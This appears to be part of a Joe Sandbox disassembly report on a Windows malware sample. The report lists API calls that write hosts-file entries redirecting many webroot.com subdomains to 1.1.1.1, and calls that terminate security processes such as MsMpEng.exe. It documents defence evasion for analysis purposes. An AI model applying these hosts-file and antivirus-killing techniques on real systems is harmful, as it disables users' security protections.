                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 partner.webroot.com), ref: 00203328
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite-sandbox.webroot.com), ref: 002033E8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite-sandbox.webroot.com), ref: 002033FA
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-co.webroot.com), ref: 002034BA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-co.webroot.com), ref: 002034CC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-ca.webroot.com), ref: 0020358C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 smtp-ca.webroot.com), ref: 0020359E
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vdi.webroot.com), ref: 0020365E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vdi.webroot.com), ref: 00203670
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 es.webroot.com), ref: 00203730
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 es.webroot.com), ref: 00203742
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 usmail.webroot.com), ref: 00203802
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 usmail.webroot.com), ref: 00203814
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sftp.webroot.com), ref: 002038D4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sftp.webroot.com), ref: 002038E6
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lyncdiscover.webroot.com), ref: 002039A6
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lyncdiscover.webroot.com), ref: 002039B8
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fr.webroot.com), ref: 00203A78
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fr.webroot.com), ref: 00203A8A
                                                        • Part of subcall function 00207E40: memcpy.VCRUNTIME140(?,?,?), ref: 00207E97
                                                        • Part of subcall function 00202240: memset.VCRUNTIME140(?,00000000,000000B8,3BC7ADCC), ref: 00202291
                                                        • Part of subcall function 00202240: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 002022B0
                                                        • Part of subcall function 00202240: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 002022D5
                                                        • Part of subcall function 00202240: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 0020230F
                                                        • Part of subcall function 00202240: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00202333
                                                        • Part of subcall function 00202240: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 0020238D
                                                        • Part of subcall function 00202240: ??7ios_base@std@@QBE_NXZ.MSVCP140(?,00000021,00000000), ref: 002023D0
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 it.webroot.com), ref: 00203B4A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 it.webroot.com), ref: 00203B5C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00203C1C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00203C2E
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 dnsptest.webroot.com), ref: 00203CEE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 dnsptest.webroot.com), ref: 00203D00
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce2.webroot.com), ref: 00203DC0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce2.webroot.com), ref: 00203DD2
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev1.webroot.com), ref: 00203E92
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev1.webroot.com), ref: 00203EA4
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 nl.webroot.com), ref: 00203F64
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 nl.webroot.com), ref: 00203F76
                                                        • Part of subcall function 00207E40: memcpy.VCRUNTIME140(00000000,?,?), ref: 00207F26
                                                        • Part of subcall function 00207E40: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207EFF
                                                        • Part of subcall function 00207E40: Concurrency::cancel_current_task.LIBCPMT ref: 00207F45
                                                        • Part of subcall function 00202240: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000), ref: 00202408
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mobiletest.webroot.com), ref: 00204036
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mobiletest.webroot.com), ref: 00204048
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-nl.webroot.com), ref: 00204108
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-nl.webroot.com), ref: 0020411A
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-es.webroot.com), ref: 002041DA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-es.webroot.com), ref: 002041EC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sip.webroot.com), ref: 002042AC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sip.webroot.com), ref: 002042BE
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 contentr.webroot.com), ref: 0020437E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 contentr.webroot.com), ref: 00204390
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 childsafe.webroot.com), ref: 00204450
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 childsafe.webroot.com), ref: 00204462
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024AF
                                                        • Part of subcall function 00202240: memset.VCRUNTIME140(?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 0020256D
                                                        • Part of subcall function 00202240: ??7ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 00202597
                                                        • Part of subcall function 00202240: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750,?,00000021,00000000), ref: 00202625
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 spyware.webroot.com), ref: 00204522
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 spyware.webroot.com), ref: 00204534
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 testvpn.webroot.com), ref: 002045F4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 testvpn.webroot.com), ref: 00204606
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-de.webroot.com), ref: 002046C6
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-de.webroot.com), ref: 002046D8
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-au.webroot.com), ref: 00204798
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-au.webroot.com), ref: 002047AA
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-fr.webroot.com), ref: 0020486A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-fr.webroot.com), ref: 0020487C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-it.webroot.com), ref: 0020493C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-it.webroot.com), ref: 0020494E
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 0020248C
                                                        • Part of subcall function 00202240: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024F2
                                                        • Part of subcall function 00202240: ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,?,00000021,00000000), ref: 00202534
                                                        • Part of subcall function 00202240: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,?,00000021,00000000), ref: 002025E1
                                                        • Part of subcall function 00202240: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 00202608
                                                        • Part of subcall function 00202240: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000021,00000000), ref: 0020265C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 extranet.webroot.com), ref: 00204A0E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 extranet.webroot.com), ref: 00204A20
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sso-tst.webroot.com), ref: 00204AE0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sso-tst.webroot.com), ref: 00204AF2
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 uk.webroot.com), ref: 00204BB2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 uk.webroot.com), ref: 00204BC4
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bb.webroot.com), ref: 00204C84
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bb.webroot.com), ref: 00204C96
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ncmec.webroot.com), ref: 00204D56
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ncmec.webroot.com), ref: 00204D68
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 stage.webroot.com), ref: 00204E28
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 stage.webroot.com), ref: 00204E3A
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest2.webroot.com), ref: 00204EFA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest2.webroot.com), ref: 00204F0C
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 00204FCC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 00204FDE
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 0020509E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 websrv-stg.webroot.com), ref: 002050B0
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 de.webroot.com), ref: 00205170
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 de.webroot.com), ref: 00205182
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 computer-security.webroot.com), ref: 00205242
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 computer-security.webroot.com), ref: 00205254
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 reseller.webroot.com), ref: 00205314
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 reseller.webroot.com), ref: 00205326
                                                        • Part of subcall function 00207DF0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00202E52,00000000,0020D35C,?,?), ref: 00207E35
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 connectuk.webroot.com), ref: 0020537D
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vpn.webroot.com), ref: 002053D4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound5.webroot.com), ref: 0020542B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound2.webroot.com), ref: 00205482
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound3.webroot.com), ref: 002054D9
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest5.webroot.com), ref: 00205530
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 view.webroot.com), ref: 00205587
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev.webroot.com), ref: 002055DE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mydata.webroot.com), ref: 00205635
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest4.webroot.com), ref: 0020568C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sfdcstage.webroot.com), ref: 002056E3
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioning.webroot.com), ref: 0020573A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 channeledge.webroot.com), ref: 00205791
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 www2.webroot.com), ref: 002057E8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest3.webroot.com), ref: 0020583F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mx.webroot.com), ref: 00205896
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 support-enterprise.webroot.com), ref: 002058ED
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 autodiscover.webroot.com), ref: 00205944
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ws.webroot.com), ref: 0020599B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 owauk.webroot.com), ref: 002059F2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound1.webroot.com), ref: 00205A49
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 research.webroot.com), ref: 00205AA0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 access-tst.webroot.com), ref: 00205AF7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 vpnuk.webroot.com), ref: 00205B4E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ws-stg.webroot.com), ref: 00205BA5
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound4.webroot.com), ref: 00205BFC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev2.webroot.com), ref: 00205C53
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 myproduct.webroot.com), ref: 00205CAA
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 labs.webroot.com), ref: 00205D01
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 tunnelfe.webroot.com), ref: 00205D58
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mailbox.webroot.com), ref: 00205DAF
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound.webroot.com), ref: 00205E06
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 access.webroot.com), ref: 00205E5D
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 sfdctest6.webroot.com), ref: 00205EB4
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 encrypt.webroot.com), ref: 00205F0B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound6.webroot.com), ref: 00205F62
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mirage.webroot.com), ref: 00205FB9
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest1.webroot.com), ref: 00206010
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 origin-stage.webroot.com), ref: 00206067
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound7.webroot.com), ref: 002060BE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev4.webroot.com), ref: 00206115
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 workspace.webroot.com), ref: 0020616C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 email.webroot.com), ref: 002061C3
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 itpro.webroot.com), ref: 0020621A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 webmail.webroot.com), ref: 00206271
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 brightcloud.webroot.com), ref: 002062C8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outlook.webroot.com), ref: 0020631F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 android.webroot.com), ref: 00206376
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce.webroot.com), ref: 002063CD
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 codingchallenge.webroot.com), ref: 00206424
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 connect.webroot.com), ref: 0020647B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 crawler.webroot.com), ref: 002064D2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cwademo.webroot.com), ref: 00206529
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 enterpriseenrollment.webroot.com), ref: 00206580
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 exchangeum.webroot.com), ref: 002065D7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fs.webroot.com), ref: 0020662E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ftp.webroot.com), ref: 00206685
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 intl.webroot.com), ref: 002066DC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 m.webroot.com), ref: 00206733
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 manageprotect.webroot.com), ref: 0020678A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 media.webroot.com), ref: 002067E1
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 myemailer.webroot.com), ref: 00206838
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ns3.webroot.com), ref: 0020688F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 origin.webroot.com), ref: 002068E6
                                                        • Part of subcall function 00207BE0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 00207C3F
                                                        • Part of subcall function 00207BE0: memcpy.VCRUNTIME140(00000000,?,?,?,00000000), ref: 00207CDF
                                                        • Part of subcall function 00207BE0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207CB4
                                                        • Part of subcall function 00207BE0: Concurrency::cancel_current_task.LIBCPMT ref: 00207CF8
                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,00000018,00000026,00207B80,MsMpEng.exe,aips.exe), ref: 00206D5E
                                                      • TerminateProcess.KERNELBASE(00000000,00000000), ref: 00206D6D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00206D74
                                                      • Sleep.KERNELBASE(000003E8,?,00000018,00000026,00207B80,WUDFHost.exe,vshost.exe,httpd.exe,liveUpdate.exe,GoogleCrashHandler.exe,dllhost.exe,GameBarFTServer.exe,GoogleUpdate.exe,xgTrayIcon.exe,jusched.exe,jucheck.exe), ref: 00206E0D
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00206E31
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Sleep$_invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memcpy$V01@$system$??6?$basic_ostream@V01@@$Internet$?setstate@?$basic_ios@?sgetc@?$basic_streambuf@CloseConcurrency::cancel_current_taskHandleOpen$??7ios_base@std@@?good@ios_base@std@@?sputc@?$basic_streambuf@EnvironmentProcessV12@Variablememset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?flush@?$basic_ostream@?sbumpc@?$basic_streambuf@?sputn@?$basic_streambuf@?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_DebuggerFileInit@?$basic_streambuf@ModuleNameOsfx@?$basic_ostream@PresentTerminateV?$basic_streambuf@getenvmalloc
